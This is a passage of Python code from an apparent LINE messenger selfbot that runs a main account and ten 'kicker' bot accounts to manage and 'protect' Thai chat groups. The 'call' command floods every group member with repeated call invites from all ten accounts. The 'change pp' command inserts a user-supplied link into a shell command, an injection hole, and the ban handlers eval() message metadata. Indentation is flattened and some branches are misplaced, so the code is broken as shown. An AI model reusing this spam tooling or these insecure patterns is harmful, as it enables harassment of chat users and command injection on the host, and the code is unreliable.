line.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': g1MID}
line.sendMessage1(msg)
elif text.lower() == "ลบแชท คิก":
if wait["selfbot"] == True:
if msg._from in admin:
try:
kicker.removeAllMessages(op.param2)
kicker.sendMessage(msg.to,"в❍тѕ✪❶🙄ลบแชทเรียบร้อย")
kicker2.removeAllMessages(op.param2)
kicker2.sendMessage(msg.to,"в❍тѕ✪➋🙄ลบแชทเรียบร้อย")
kicker3.removeAllMessages(op.param2)
kicker3.sendMessage(msg.to,"в❍тѕ✪❸🙄ลบแชทเรียบร้อย")
kicker4.removeAllMessages(op.param2)
kicker4.sendMessage(msg.to,"в❍тѕ✪❹🙄ลบแชทเรียบร้อย")
kicker5.removeAllMessages(op.param2)
kicker6.sendMessage(msg.to,"в❍тѕ✪❺🙄ลบแชทเรียบร้อย")
kicker6.removeAllMessages(op.param2)
kicker6.sendMessage(msg.to,"в❍тѕ✪❻🙄ลบแชทเรียบร้อย")
kicker7.removeAllMessages(op.param2)
kicker7.sendMessage(msg.to,"в❍тѕ✪❼🙄ลบแชทเรียบร้อย")
kicker8.removeAllMessages(op.param2)
kicker8.sendMessage(msg.to,"в❍тѕ✪❽🙄ลบแชทเรียบร้อย")
kicker9.removeAllMessages(op.param2)
kicker9.sendMessage(msg.to,"в❍тѕ✪❾🙄ลบแชทเรียบร้อย")
kicker10.removeAllMessages(op.param2)
kicker10.sendMessage(msg.to,"в❍тѕ❶✪🙄ลบแชทเรียบร้อย")
line.sendReplyMessage(msg_id,to,"☠️в❍тѕ✪🙄✪ได้ลบประวัติแชทเรียบร้อย☠️")
except Exception as e:
line.sendMessage(msg.to,"เกิดข้อผิดพลาด\n" +str(e))
elif cmd == "แจก":
if wait["selfbot"] == True:
if msg._from in admin:
kicker.sendMessage(to, text=None, contentMetadata=None, contentType=9)
kicker2.sendMessage(to, text=None, contentMetadata=None, contentType=9)
kicker3.sendMessage(to, text=None, contentMetadata=None, contentType=9)
kicker4.sendMessage(to, text=None, contentMetadata=None, contentType=9)
kicker5.sendMessage(to, text=None, contentMetadata=None, contentType=9)
kicker6.sendMessage(to, text=None, contentMetadata=None, contentType=9)
kicker7.sendMessage(to, text=None, contentMetadata=None, contentType=9)
kicker8.sendMessage(to, text=None, contentMetadata=None, contentType=9)
kicker9.sendMessage(to, text=None, contentMetadata=None, contentType=9)
kicker10.sendMessage(to, text=None, contentMetadata=None, contentType=9)
elif cmd == "เชิญคิก":
if wait["selfbot"] == True:
if msg._from in admin:
try:
anggota = [Amid,Bmid,Cmid,Dmid,Emid,Fmid,Gmid,Hmid,Imid,Jmid]
line.inviteIntoGroup(msg.to, anggota)
kicker.acceptGroupInvitation(msg.to)
kicker2.acceptGroupInvitation(msg.to)
kicker3.acceptGroupInvitation(msg.to)
kicker4.acceptGroupInvitation(msg.to)
kicker5.acceptGroupInvitation(msg.to)
kicker6.acceptGroupInvitation(msg.to)
kicker7.acceptGroupInvitation(msg.to)
kicker8.acceptGroupInvitation(msg.to)
kicker9.acceptGroupInvitation(msg.to)
kicker10.acceptGroupInvitation(msg.to)
except Exception as e:
line.sendMessage(msg.to,"เกิดข้อผิดพลาด\n" +str(e))
elif cmd == "เปิดกันผี":
if wait["selfbot"] == True:
if msg._from in admin:
try:
ginfo = line.getGroup(msg.to)
line.inviteIntoGroup(msg.to, [g1MID])
line.sendMessage(msg.to,"Group 「"+str(ginfo.name)+"」 ทำการเปิดใช้งานโหมดป้องกันJS")
except Exception as e:
line.sendMessage(msg.to,"เกิดข้อผิดพลาด\n" +str(e))
elif cmd == "ไปหำ":
if wait["selfbot"] == True:
if msg._from in admin:
G = line.getGroup(msg.to)
kicker.leaveGroup(msg.to)
kicker2.leaveGroup(msg.to)
kicker3.leaveGroup(msg.to)
kicker4.leaveGroup(msg.to)
kicker5.leaveGroup(msg.to)
kicker6.leaveGroup(msg.to)
kicker7.leaveGroup(msg.to)
kicker8.leaveGroup(msg.to)
kicker9.leaveGroup(msg.to)
kicker10.leaveGroup(msg.to)
elif cmd == "ผีมา":
if msg._from in admin:
G = line.getGroup(msg.to)
ginfo = line.getGroup(msg.to)
G.preventedJoinByTicket = False
line.updateGroup(G)
invsend = 0
Ticket = line.reissueGroupTicket(msg.to)
g1.acceptGroupInvitationByTicket(msg.to,Ticket)
G = g1.getGroup(msg.to)
G.preventedJoinByTicket = True
g1.updateGroup(G)
elif cmd == "ผีออก":
if msg._from in admin:
G = line.getGroup(msg.to)
g1.leaveGroup(msg.to)
elif cmd == "รี" or cmd == "sp":
if wait["selfbot"] == True:
if msg._from in admin:
start = time.time()
kicker.sendMessage("u21d04f683a70ee8776c4c58a0358c204", ".")
elapsed_time = time.time() - start
kicker.sendMessage(msg.to, " %s ƑմçҟᎠҽѵìӀ" % (elapsed_time))
start = time.time()
kicker2.sendMessage("u21d04f683a70ee8776c4c58a0358c204", ".")
elapsed_time = time.time() - start
kicker2.sendMessage(msg.to, " %s ƑմçҟᎠҽѵìӀ" % (elapsed_time))
start = time.time()
kicker3.sendMessage("u21d04f683a70ee8776c4c58a0358c204", ".")
elapsed_time = time.time() - start
kicker3.sendMessage(msg.to, " %s ƑմçҟᎠҽѵìӀ" % (elapsed_time))
start = time.time()
kicker4.sendMessage("u21d04f683a70ee8776c4c58a0358c204", ".")
elapsed_time = time.time() - start
kicker4.sendMessage(msg.to, " %s ƑմçҟᎠҽѵìӀ" % (elapsed_time))
start = time.time()
kicker5.sendMessage("u21d04f683a70ee8776c4c58a0358c204", ".")
elapsed_time = time.time() - start
kicker5.sendMessage(msg.to, " %s ƑմçҟᎠҽѵìӀ" % (elapsed_time))
start = time.time()
kicker6.sendMessage("u21d04f683a70ee8776c4c58a0358c204", ".")
elapsed_time = time.time() - start
kicker6.sendMessage(msg.to, " %s ƑմçҟᎠҽѵìӀ" % (elapsed_time))
start = time.time()
kicker7.sendMessage("u21d04f683a70ee8776c4c58a0358c204", ".")
elapsed_time = time.time() - start
kicker7.sendMessage(msg.to, " %s ƑմçҟᎠҽѵìӀ" % (elapsed_time))
start = time.time()
kicker8.sendMessage("u21d04f683a70ee8776c4c58a0358c204", ".")
elapsed_time = time.time() - start
kicker8.sendMessage(msg.to, " %s ƑմçҟᎠҽѵìӀ" % (elapsed_time))
start = time.time()
kicker9.sendMessage("u21d04f683a70ee8776c4c58a0358c204", ".")
elapsed_time = time.time() - start
kicker9.sendMessage(msg.to, " %s ƑմçҟᎠҽѵìӀ" % (elapsed_time))
start = time.time()
kicker10.sendMessage("u21d04f683a70ee8776c4c58a0358c204", ".")
elapsed_time = time.time() - start
kicker10.sendMessage(msg.to, " %s ƑմçҟᎠҽѵìӀ" % (elapsed_time))
start = time.time()
elif "call" in msg.text.lower():
if msg.toType == 2:
sep = msg.text.split(" ")
resp = msg.text.replace(sep[0] + " ","")
num = int(resp)
try:
sendMention1(msg.to, sender, "「Call Ready」 ", "")
except:
pass
while range(1):
group = kicker.getGroup(to)
members = [mem.mid for mem in group.members]
for var in range(num):
kicker.acquireGroupCallRoute(to)
kicker.inviteIntoGroupCall(to, contactIds=members)
kicker2.acquireGroupCallRoute(to)
kicker2.inviteIntoGroupCall(to, contactIds=members)
kicker3.acquireGroupCallRoute(to)
kicker3.inviteIntoGroupCall(to, contactIds=members)
kicker4.acquireGroupCallRoute(to)
kicker4.inviteIntoGroupCall(to, contactIds=members)
kicker5.acquireGroupCallRoute(to)
kicker5.inviteIntoGroupCall(to, contactIds=members)
kicker6.acquireGroupCallRoute(to)
kicker6.inviteIntoGroupCall(to, contactIds=members)
kicker7.acquireGroupCallRoute(to)
kicker7.inviteIntoGroupCall(to, contactIds=members)
kicker8.acquireGroupCallRoute(to)
kicker8.inviteIntoGroupCall(to, contactIds=members)
kicker9.acquireGroupCallRoute(to)
kicker9.inviteIntoGroupCall(to, contactIds=members)
kicker10.acquireGroupCallRoute(to)
kicker10.inviteIntoGroupCall(to, contactIds=members)
sendMention1(msg.to, sender, "「Call End」 ", "")
break
else:
kicker.sendMessage(to,"คำสั่งนี้สามารถใช้ได้เฉพาะกลุ่ม")
#===========Protection============#
elif 'Po1 ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('กันลิ้ง ','')
if spl == 'on':
if msg.to in protectqr:
msgs = "URL Protect Start"
else:
protectqr.append(msg.to)
ginfo = line.getGroup(msg.to)
msgs = "URL Protect Start\nIn Group : " +str(ginfo.name)
line.sendMessage(msg.to, "👊STATUS PROTECT URL👊\n" + msgs)
elif spl == 'off':
if msg.to in protectqr:
protectqr.remove(msg.to)
ginfo = line.getGroup(msg.to)
msgs = "URL Protect Trun off\nIn Group : " +str(ginfo.name)
else:
msgs = "URL Protect Trun off"
line.sendMessage(msg.to, "👊STATUS PROTECT URL👊\n" + msgs)
elif 'Po2 ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('กันเตะ ','')
if spl == 'on':
if msg.to in protectkick:
msgs = "Kick Member Protect Start"
else:
protectkick.append(msg.to)
ginfo = line.getGroup(msg.to)
msgs = "Kick Member Protect Start\nIn Group : " +str(ginfo.name)
line.sendMessage(msg.to, "👊STATUS PROTECT KICK👊\n" + msgs)
elif spl == 'off':
if msg.to in protectkick:
protectkick.remove(msg.to)
ginfo = line.getGroup(msg.to)
msgs = "Kick Member Protect Trun off\nIn Group : " +str(ginfo.name)
else:
msgs = "Kick Member Protect Trun off"
line.sendMessage(msg.to, "👊STATUS PROTECT KICK👊\n" + msgs)
elif 'Po3 ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('กันเชิญ ','')
if spl == 'on':
if msg.to in protecARoin:
msgs = "Joinkick Start"
else:
protecARoin.append(msg.to)
ginfo = line.getGroup(msg.to)
msgs = "Joinkick Start\nIn Group : " +str(ginfo.name)
line.sendMessage(msg.to, "👊STATUS PROTECT JOIN👊\n" + msgs)
elif spl == 'off':
if msg.to in protecARoin:
protecARoin.remove(msg.to)
ginfo = line.getGroup(msg.to)
msgs = "Joinkick Trun off\nIn Group : " +str(ginfo.name)
else:
msgs = "Joinkick Trun off"
line.sendMessage(msg.to, "👊STATUS PROTECT JOIN👊\n" + msgs)
elif 'Protectcanceljs ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Protectcanceljs ','')
if spl == 'on':
if msg.to in protectcanceljs:
msgs = "ป้องกันยกเลิกเชิญบอทเปิดใช้งาน"
else:
protectcanceljs[msg.to] = True
f=codecs.open('protectcanceljs.json','w','utf-8')
json.dump(protectcanceljs, f, sort_keys=True, indent=4,ensure_ascii=False)
ginfo = line.getGroup(msg.to)
msgs = "ป้องกันยกเลิกเชิญบอทเปิดใช้งาน\nIn Group : " +str(ginfo.name)
line.sendMessage(msg.to, "👊STATUS PROTECT CANCEL👊\n" + msgs)
elif spl == 'off':
if msg.to in protectcanceljs:
del protectcanceljs[msg.to]
f=codecs.open('protectcanceljs.json','w','utf-8')
json.dump(protectcanceljs, f, sort_keys=True, indent=4,ensure_ascii=False)
ginfo = line.getGroup(msg.to)
msgs = "ป้องกันยกเลิกเชิญบอทปิดใช้งาน\nIn Group : " +str(ginfo.name)
else:
msgs = "ป้องกันยกเลิกเชิญบอทปิดใช้งาน"
line.sendMessage(msg.to, "??STATUS PROTECT CANCEL👊\n" + msgs)
elif 'Protectcancel ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Protectcancel ','')
if spl == 'on':
if msg.to in protectcancel:
msgs = "ป้องกันยกเลิกเชิญถูกเปิดใช้งานอยู่แล้ว"
else:
protectcancel[msg.to] = True
f=codecs.open('protectcancel.json','w','utf-8')
json.dump(protectcancel, f, sort_keys=True, indent=4,ensure_ascii=False)
ginfo = line.getGroup(msg.to)
msgs = "ป้องกันยกเลิกเชิญเปิดใช้งาน\nIn Group : " +str(ginfo.name)
line.sendMessage(msg.to, "👊STATUS PROTECT CANCEL👊\n" + msgs)
elif spl == 'off':
if msg.to in protectcancel:
del protectcancel[msg.to]
f=codecs.open('protectcancel.json','w','utf-8')
json.dump(protectcancel, f, sort_keys=True, indent=4,ensure_ascii=False)
ginfo = line.getGroup(msg.to)
msgs = "ป้องกันยกเลิกเชิญปิดใช้งาน\nIn Group : " +str(ginfo.name)
else:
msgs = "ป้องกันยกเลิกเชิญถูกปิดใช้งานอยู่แล้ว"
line.sendMessage(msg.to, "👊STATUS PROTECT CANCEL👊\n" + msgs)
elif 'Po4 ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Po4 ','')
if spl == 'on':
if msg.to in protectinvite:
msgs = "InviteProtect Start"
else:
protectinvite[msg.to] = True
f=codecs.open('protectinvite.json','w','utf-8')
json.dump(protectinvite, f, sort_keys=True, indent=4,ensure_ascii=False)
ginfo = line.getGroup(msg.to)
msgs = "InviteProtect Start\nIn Group : " +str(ginfo.name)
line.sendMessage(msg.to, "👊STATUS PROTECT CANCEL👊\n" + msgs)
elif spl == 'off':
if msg.to in protectinvite:
del protectinvite[msg.to]
f=codecs.open('protectinvite.json','w','utf-8')
json.dump(protectinvite, f, sort_keys=True, indent=4,ensure_ascii=False)
ginfo = line.getGroup(msg.to)
msgs = "InviteProtect Trun off\nIn Group : " +str(ginfo.name)
else:
msgs = "InviteProtect Trun off"
line.sendMessage(msg.to, "👊STATUS PROTECT CANCEL👊\n" + msgs)
elif 'กันjs ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('กันjs ','')
if spl == 'on':
if msg.to in protectantijs:
msgs = "ป้องกันJSถูกเปิดใช้งานอยู่แล้ว"
else:
protectantijs[msg.to] = True
f=codecs.open('protectantijs.json','w','utf-8')
json.dump(protectantijs, f, sort_keys=True, indent=4,ensure_ascii=False)
ginfo = line.getGroup(msg.to)
msgs = "ป้องกันJSเปิดใช้งาน\nIn Group : " +str(ginfo.name)
line.sendMessage(msg.to, "👊STATUS PROTECT JS👊\n" + msgs)
elif spl == 'off':
if msg.to in protectantijs:
del protectantijs[msg.to]
f=codecs.open('protectantijs.json','w','utf-8')
json.dump(protectantijs, f, sort_keys=True, indent=4,ensure_ascii=False)
ginfo = line.getGroup(msg.to)
msgs = "ป้องกันJSปิดใช้งาน\nIn Group : " +str(ginfo.name)
else:
msgs = "ป้องกันJSถูกปิดใช้งานอยู่แล้ว"
line.sendMessage(msg.to, "👊STATUS PROTECT JS👊\n" + msgs)
elif "whois " in msg.text.lower():
spl = re.split("whois ",msg.text,flags=re.IGNORECASE)
if spl[0] == "":
msg.contentType = 13
msg.text = None
msg.contentMetadata = {"mid":spl[1]}
line.sendMessage(msg.to,text = None,contentMetadata = {"mid":spl[1]},contentType = 13)
elif 'Ghost ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Ghost ','')
if spl == 'on':
if msg.to in ghost:
msgs = "เปิดใช้งานโหมด Ghost"
else:
ghost[msg.to] = True
f=codecs.open('ghost.json','w','utf-8')
json.dump(ghost, f, sort_keys=True, indent=4,ensure_ascii=False)
ginfo = line.getGroup(msg.to)
msgs = "เปิดใช้งานโหมด Ghost\nIn Group : " +str(ginfo.name)
line.sendMessage(msg.to, "「STATUS PROTECT JS」\n" + msgs)
elif spl == 'off':
if msg.to in ghost:
del ghost[msg.to]
f=codecs.open('ghost.json','w','utf-8')
json.dump(ghost, f, sort_keys=True, indent=4,ensure_ascii=False)
ginfo = line.getGroup(msg.to)
msgs = "ปิดใช้งานโหมด Ghost\nIn Group : " +str(ginfo.name)
else:
msgs = "ปิดใช้งานโหมด Ghost"
line.sendMessage(msg.to, "「STATUS PROTECT JS」\n" + msgs)
elif ("Ban " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["blacklist"][target] = True
line.sendMessage(msg.to,"เพิ่มบัญชีดำสำเร็จแล้ว")
except:
pass
elif ("Unban " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
del wait["blacklist"][target]
line.sendMessage(msg.to,"ลบบัญชีดำสำเร็จแล้ว")
except:
pass
elif cmd == "ban":
if wait["selfbot"] == True:
if msg._from in admin:
wait["wblacklist"] = True
line.sendMessage(to,"Send contact you will be blacklist")
elif cmd == "unban":
if wait["selfbot"] == True:
if msg._from in admin:
wait["dblacklist"] = True
line.sendMessage(to,"Send contact you will be whitelist")
elif cmd == "change pp":
link = removeCmd("change pp", text)
contact = client.getContact(sender)
pic = "http://dl.profile.line-cdn.net/{}".format(contact.pictureStatus)
subprocess.getoutput('youtube-dl --format mp4 --output TeamAnuBot.mp4 {}'.format(link))
pict = line.downloadFileURL(pic)
vids = "TeamAnuBot.mp4"
time.sleep(2)
changeVideoAndPictureProfile(pict, vids)
line.sendReplyMessage(msg.id,to, "Changed dual picture & video.", contentMetadata = {'AGENT_ICON': 'http://dl.profile.line-cdn.net/'+client.getContact(clientMID).pictureStatus, 'AGENT_NAME': '', 'AGENT_LINK': 'http://line.me/ti/p/~anyun2k15'})
os.remove("TeamAnuBot.mp4")
elif cmd == "ดำ":
if wait["selfbot"] == True:
if msg._from in admin:
if wait["blacklist"] == {}:
line.sendMessage(msg.to,"👊ไม่พบผู้ติดบัญชีแดง👊")
else:
ma = ""
for i in wait["blacklist"]:
ma = line.getContact(i)
line.sendMessage(msg.to, None, contentMetadata={'mid': i}, contentType=13)
elif cmd == "cb":
if wait["selfbot"] == True:
if msg._from in admin:
wait["blacklist"] = {}
ragets = line.getContacts(wait["blacklist"])
mc = "「%i」ลบดำเรียบร้อย" % len(ragets)
line.sendMessage(to,"Succes Clear Blacklist " +mc)
kicker.sendMessage(msg.to,"ล้างบัญชีดำเรียบร้อย..." +mc)
kicker2.sendMessage(msg.to,"ล้างบัญชีดำเรียบร้อย..." +mc)
kicker3.sendMessage(msg.to,"ล้างบัญชีดำเรียบร้อย..." +mc)
kicker4.sendMessage(msg.to,"ล้างบัญชีดำเรียบร้อย..." +mc)
kicker5.sendMessage(msg.to,"ล้างบัญชีดำเรียบร้อย..." +mc)
kicker6.sendMessage(msg.to,"ล้างบัญชีดำเรียบร้อย..." +mc)
kicker7.sendMessage(msg.to,"ล้างบัญชีดำเรียบร้อย..." +mc)
kicker8.sendMessage(msg.to,"ล้างบัญชีดำเรียบร้อย..." +mc)
kicker9.sendMessage(msg.to,"ล้างบัญชีดำเรียบร้อย..." +mc)
kicker10.sendMessage(msg.to,"ล้างบัญชีดำเรียบร้อย..." +mc)
#===========BOT UPDATE============#
elif cmd.startswith('error'):
textt = removeCmd(text, setKey)
texttl = textt.lower()
cond = textt.split(' ')
res = '╭───「 Error 」'
res += '\n├👊 Usage : '
res += '\n│🌷 {key}Error'
res += '\n│🌷 {key}Error Logs'
res += '\n│🌷 {key}Error Reset'
res += '\n│🌷 {key}Error Detail <errid>'
res += '\n╰───👊【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】👊'
if cmd == 'error':
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif cond[0].lower() == 'logs':
try:
filee = open('errorLog.txt', 'r')
except FileNotFoundError:
return line.sendMessage(to, 'ไม่สามารถแสดงบันทึกข้อผิดพลาดได้\nไม่พบไฟล์')
errors = [err.strip() for err in filee.readlines()]
filee.close()
if not errors: return line.sendMessage(to, 'ไม่สามารถแสดงบันทึกข้อผิดพลาดได้\nบันทึกข้อผิดพลาดว่างเปล่า')
res = '╭───「 Error Logs 」'
res += '\n├ List :'
parsed_len = len(errors)//200+1
no = 0
for point in range(parsed_len):
for error in errors[point*200:(point+1)*200]:
if not error: continue
no += 1
res += '\n│ %i. %s' % (no, error)
if error == errors[-1]:
res += '\n╰───【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】'
if res:
if res.startswith('\n'): res = res[1:]
line.sendMessage(to, res)
res = ''
elif cond[0].lower() == 'reset':
filee = open('errorLog.txt', 'w')
filee.write('')
filee.close()
shutil.rmtree('tmp/errors/', ignore_errors=True)
os.system('mkdir tmp/errors')
line.sendMessage(to, 'Success reset error logs')
elif cond[0].lower() == 'detail':
if len(cond) < 2:
return line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
errid = cond[1]
if os.path.exists('tmp/errors/%s.txt' % errid):
with open('tmp/errors/%s.txt' % errid, 'r') as f:
line.sendMessage(to, f.read())
else:
return line.sendMessage(to, 'Failed display details error, errorid not valid')
else:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif txt.startswith('setkey'):
textt = removeCmd(text, setKey)
texttl = textt.lower()
res = '╭───「 Setting Key 」'
res += '\n├👊 Status : ' + bool_dict[settings['setKey']['status']][1]
res += '\n├👊 Key : ' + settings['setKey']['key'].title()
res += '\n├👊 Usage : '
res += '\n│🌷 Setkey'
res += '\n│🌷 Setkey <on/off>'
res += '\n│🌷 Setkey <key>'
res += '\n╰───👊【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】👊'
if txt == 'setkey':
line.sendMessage(to, parsingRes(res))
elif texttl == 'on':
if settings['setKey']['status']:
line.sendMessage(to, 'Failed activate setkey, setkey already active')
else:
settings['setKey']['status'] = True
line.sendMessage(to, 'Success activated setkey')
elif texttl == 'off':
if not settings['setKey']['status']:
line.sendMessage(to, 'Failed deactivate setkey, setkey already deactive')
else:
settings['setKey']['status'] = False
line.sendMessage(to, 'Success deactivated setkey')
else:
settings['setKey']['key'] = texttl
line.sendMessage(to, 'Success change set key to (%s)' % textt)
elif cmd.startswith('autoadd'):
textt = removeCmd(text, setKey)
texttl = textt.lower()
cond = textt.split(' ')
res = '╭───「 Auto Add 」'
res += '\n├👊 Status : ' + bool_dict[settings['autoAdd']['status']][1]
res += '\n├👊 Reply : ' + bool_dict[settings['autoAdd']['reply']][0]
res += '\n├👊 Reply Message : ' + settings['autoAdd']['message']
res += '\n├👊 Usage : '
res += '\n│🌷 {key}AutoAdd'
res += '\n│🌷 {key}AutoAdd <on/off>'
res += '\n│🌷 {key}AutoAdd Reply <on/off>'
res += '\n│🌷 {key}AutoAdd <message>'
res += '\n╰───👊【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】👊'
if cmd == 'autoadd':
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif texttl == 'on':
if settings['autoAdd']['status']:
line.sendMessage(to, 'เปิดรับแอดออโต้')
else:
settings['autoAdd']['status'] = True
line.sendMessage(to, 'เปิดรับแอดออโต้')
elif texttl == 'off':
if not settings['autoAdd']['status']:
line.sendMessage(to, 'ปิดรับแอดออโต้')
else:
settings['autoAdd']['status'] = False
line.sendMessage(to, 'ปิดรับแอดออโต้')
elif cond[0].lower() == 'reply':
if len(cond) < 2:
return line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
if cond[1].lower() == 'on':
if settings['autoAdd']['reply']:
line.sendMessage(to, 'เปิดข้อความทักคนแอด')
else:
settings['autoAdd']['reply'] = True
line.sendMessage(to, 'เปิดข้อความทักคนแอด')
elif cond[1].lower() == 'off':
if not settings['autoAdd']['reply']:
line.sendMessage(to, 'ปิดข้อความทักคนแอด')
else:
settings['autoAdd']['reply'] = False
line.sendMessage(to, 'ปิดข้อความทักคนแอด')
else:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
else:
settings['autoAdd']['message'] = textt
line.sendMessage(to, 'เปลี่ยนข้อความออโต้แอดเป็น `%s`' % textt)
elif cmd.startswith('autojoin'):
textt = removeCmd(text, setKey)
texttl = textt.lower()
cond = textt.split(' ')
res = '╭───「 Auto Join 」'
res += '\n├👊 Status : ' + bool_dict[settings['autoJoin']['status']][1]
res += '\n├👊 Reply : ' + bool_dict[settings['autoJoin']['reply']][0]
res += '\n├👊 Reply Message : ' + settings['autoJoin']['message']
res += '\n├👊 Usage : '
res += '\n│🌷 {key}AutoJoin'
res += '\n│🌷 {key}AutoJoin <on/off>'
res += '\n│🌷 {key}AutoJoin Ticket <on/off>'
res += '\n│🌷 {key}AutoJoin Reply <on/off>'
res += '\n│🌷 {key}AutoJoin <message>'
res += '\n╰───👊【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】👊'
if cmd == 'autojoin':
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif texttl == 'on':
if settings['autoJoin']['status']:
line.sendMessage(to, 'เปิดเข้าร่วมกลุ่มออโต้')
else:
settings['autoJoin']['status'] = True
line.sendMessage(to, 'เปิดเข้าร่วมกลุ่มออโต้')
elif texttl == 'off':
if not settings['autoJoin']['status']:
line.sendMessage(to, 'ปิดเข้าร่วมกลุ่มออโต้')
else:
settings['autoJoin']['status'] = False
line.sendMessage(to, 'ปิดเข้าร่วมกลุ่มออโต้')
elif cond[0].lower() == 'reply':
if len(cond) < 2:
return line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
if cond[1].lower() == 'on':
if settings['autoJoin']['reply']:
line.sendMessage(to, 'เปิดความทักคนเชิญเข้ากลุ่ม')
else:
settings['autoJoin']['reply'] = True
line.sendMessage(to, 'เปิดความทักคนเชิญเข้ากลุ่ม')
elif cond[1].lower() == 'off':
if not settings['autoJoin']['reply']:
line.sendMessage(to, 'ปิดความทักคนเชิญเข้ากลุ่ม')
else:
settings['autoJoin']['reply'] = False
line.sendMessage(to, 'ปิดความทักคนเชิญเข้ากลุ่ม')
else:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif cmd == "autoblock on" or text.lower() == 'บล็อค เปิด':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoBlock"] = True
aditmadzs.sendMessage(msg.to,"เปิดออโต้บล็อคเรียบร้อย...")
elif cmd == "autoblock off" or text.lower() == 'บล็อค ปิด':
if wait["selfbot"] == True:
if msg._from in admin:
wait["autoBlock"] = False
aditmadzs.sendMessage(msg.to,"ปิดออโต้บล็อคเรียบร้อย...")
elif cond[0].lower() == 'ticket':
if len(cond) < 2:
return line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
if cond[1].lower() == 'on':
if settings['autoJoin']['ticket']:
line.sendMessage(to, 'เปิดเข้ากลุ่มออโต้ด้วยลิ้ง')
else:
settings['autoJoin']['ticket'] = True
line.sendMessage(to, 'เปิดเข้ากลุ่มออโต้ด้วยลิ้ง')
elif cond[1].lower() == 'off':
if not settings['autoJoin']['ticket']:
line.sendMessage(to, 'ปิดเข้ากลุ่มออโต้ด้วยลิ้ง')
else:
settings['autoJoin']['ticket'] = False
line.sendMessage(to, 'ปิดเข้ากลุ่มออโต้ด้วยลิ้ง')
else:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
else:
settings['autoJoin']['message'] = textt
line.sendMessage(to, 'ข้อความทักคนเชิญเข้ากลุ่มเปลี่ยนเป็น `%s`' % textt)
elif cmd.startswith('autorespondmention'):
textt = removeCmd(text, setKey)
texttl = textt.lower()
res = '╭───「 Auto Respond 」'
res += '\n├👊 Status : ' + bool_dict[settings['autoRespondMention']['status']][1]
res += '\n├👊 Reply Message : ' + settings['autoRespondMention']['message']
res += '\n├👊 Usage : '
res += '\n│🌷 {key}AutoRespondMention'
res += '\n│🌷 {key}AutoRespondMention <on/off>'
res += '\n│🌷 {key}AutoRespondMention <message>'
res += '\n╰───👊【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】👊'
if cmd == 'autorespondmention':
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif texttl == 'on':
if settings['autoRespondMention']['status']:
line.sendMessage(to, 'เปิดตอบกลับคนแทค')
else:
settings['autoRespondMention']['status'] = True
line.sendMessage(to, 'เปิดตอบกลับคนแทค')
elif texttl == 'off':
if not settings['autoRespondMention']['status']:
line.sendMessage(to, 'ปิดตอบกลับคนแทค')
else:
settings['autoRespondMention']['status'] = False
line.sendMessage(to, 'ปิดตอบกลับคนแทค')
else:
settings['autoRespondMention']['message'] = textt
line.sendMessage(to, 'ข้อความตอบกลับคนแทคเปลี่ยนเป็น `%s`' % textt)
elif cmd.startswith('autorespond'):
textt = removeCmd(text, setKey)
texttl = textt.lower()
res = '╭───「 Auto Respond 」'
res += '\n├👊 Status : ' + bool_dict[settings['autoRespond']['status']][1]
res += '\n├👊 Reply Message : ' + settings['autoRespond']['message']
res += '\n├👊 Usage : '
res += '\n│🌷 {key}AutoRespond'
res += '\n│🌷 {key}AutoRespond <on/off>'
res += '\n│🌷 {key}AutoRespond <message>'
res += '\n╰───👊【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】👊'
if cmd == 'autorespond':
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif texttl == 'on':
if settings['autoRespond']['status']:
line.sendMessage(to, 'เปิดตอบกลับอัตโนมัติ')
else:
settings['autoRespond']['status'] = True
line.sendMessage(to, 'เปิดตอบกลับอัตโนมัติ')
elif texttl == 'off':
if not settings['autoRespond']['status']:
line.sendMessage(to, 'ปิดตอบกลับอัตโนมัติ')
else:
settings['autoRespond']['status'] = False
line.sendMessage(to, 'ปิดตอบกลับอัตโนมัติ')
else:
settings['autoRespond']['message'] = textt
line.sendMessage(to, 'ข้อความเปิดตอบกลับอัตโนมัติถูกเปลี่ยนเป็น `%s`' % textt)
elif cmd.startswith('autoread '):
textt = removeCmd(text, setKey)
texttl = textt.lower()
if texttl == 'on':
if settings['autoRead']:
line.sendMessage(to, 'เปิดอ่านออโต้')
else:
settings['autoRead'] = True
line.sendMessage(to, 'เปิดอ่านออโต้')
